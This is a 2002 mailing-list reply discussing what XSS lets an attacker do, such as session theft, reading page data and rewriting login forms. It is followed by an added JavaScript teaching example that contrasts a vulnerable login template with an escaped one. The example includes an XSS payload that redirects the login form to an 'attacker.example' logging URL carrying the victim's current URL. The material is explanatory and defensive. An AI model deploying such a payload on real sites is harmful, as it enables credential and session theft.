Vulnerability Development mailing list archives
Re: CSS implication
From: "b0iler _" <b0iler () hotmail com>
Date: Tue, 19 Mar 2002 14:45:31 -0700
Although very similar to XSS, writing SSI, PHP, or any other kind of server-side language is not XSS, but rather a remote file-writing vulnerability. The difference is there and I don't feel we should confuse the two. I am not sure if you would call client-side scripting that is saved to a file on the server XSS, but I personally do not count it as such.
Here are a few other things for your paper. You can redirect the user to a URL or submit form data. Very dangerous if the user is allowed to do things like change their password when they are logged in without having to supply their password. Session theft.
Read field data or HTML. Can be dangerous if a user's password, credit card number, real name, or other sensitive information is printed to the same page(s) the XSS has access to.
You can change the HTML of a page. Dangerous, for example, if the user is supposed to input their username and password: you can change where the form is sent, making it instead a logging script set up on your server.
Matt Priestley mentioned session theft, which is what most of these have to deal with. Also you can grab the current URL, which can sometimes hold sensitive info - usernames, passwords, session IDs, etc.
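The form-rewriting and URL-grabbing consequences listed in the post above, as an added example that is not code from the original post or thread: a login-page template that reflects an untrusted "username" value, rendered naively and then with HTML escaping, together with a constructed payload that points the form at an attacker-controlled logging script and appends the victim's current URL. The template, the function names and the attacker URL are assumptions made for illustration only.

```javascript
// Added example (not from the original post): a reflected-value login form in a
// vulnerable and a hardened form, plus a constructed XSS payload of the kind the
// post describes. Template, function names and the attacker URL are assumptions.

// Escape the characters that can break out of HTML text or a quoted attribute.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, "&amp;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;")
    .replace(/"/g, "&quot;")
    .replace(/'/g, "&#39;");
}

// Vulnerable rendering: the value is concatenated into the markup unchanged.
function renderLoginVulnerable(username) {
  return (
    '<form action="/login" method="post">' +
    '<input name="user" value="' + username + '">' +
    '<input name="pass" type="password">' +
    '<button>Log in</button>' +
    '</form>'
  );
}

// Hardened rendering: identical template, value escaped for attribute context.
function renderLoginHardened(username) {
  return renderLoginVulnerable(escapeHtml(username));
}

// Constructed attacker input. It closes the value attribute and the <input>,
// injects a script that repoints the form at an attacker-controlled logger
// (with the victim's current URL, which may carry a session id, appended), then
// opens a dummy attribute to swallow the template's trailing `">`.
const PAYLOAD =
  '"><script>' +
  'document.forms[0].action="https://attacker.example/log?from="' +
  '+encodeURIComponent(location.href)' +
  '</script><input value="';

// Return the bodies of every live <script> element in a rendered fragment; a
// non-empty result on output built from untrusted data is the thing to look for.
function liveScripts(html) {
  const out = [];
  const re = /<script\b[^>]*>([\s\S]*?)<\/script>/gi;
  let m;
  while ((m = re.exec(html)) !== null) out.push(m[1]);
  return out;
}

// Return the static action of the first form, so one can confirm the hardened
// page still submits to the intended endpoint and carries no injected script.
function firstFormAction(html) {
  const m = /<form\b[^>]*\baction="([^"]*)"/i.exec(html);
  return m ? m[1] : null;
}

// Stand-alone demonstration.
console.log("vulnerable scripts:", liveScripts(renderLoginVulnerable(PAYLOAD)));
console.log("hardened scripts:  ", liveScripts(renderLoginHardened(PAYLOAD)));
console.log("hardened action:   ", firstFormAction(renderLoginHardened(PAYLOAD)));
```

In the vulnerable rendering the payload becomes a live script element that, once the page loads in a browser, changes where the credentials are posted and leaks the current URL; in the hardened rendering the same bytes are inert text inside the value attribute. Escaping for the exact context (here, a double-quoted attribute) is what makes the difference, not filtering for particular strings.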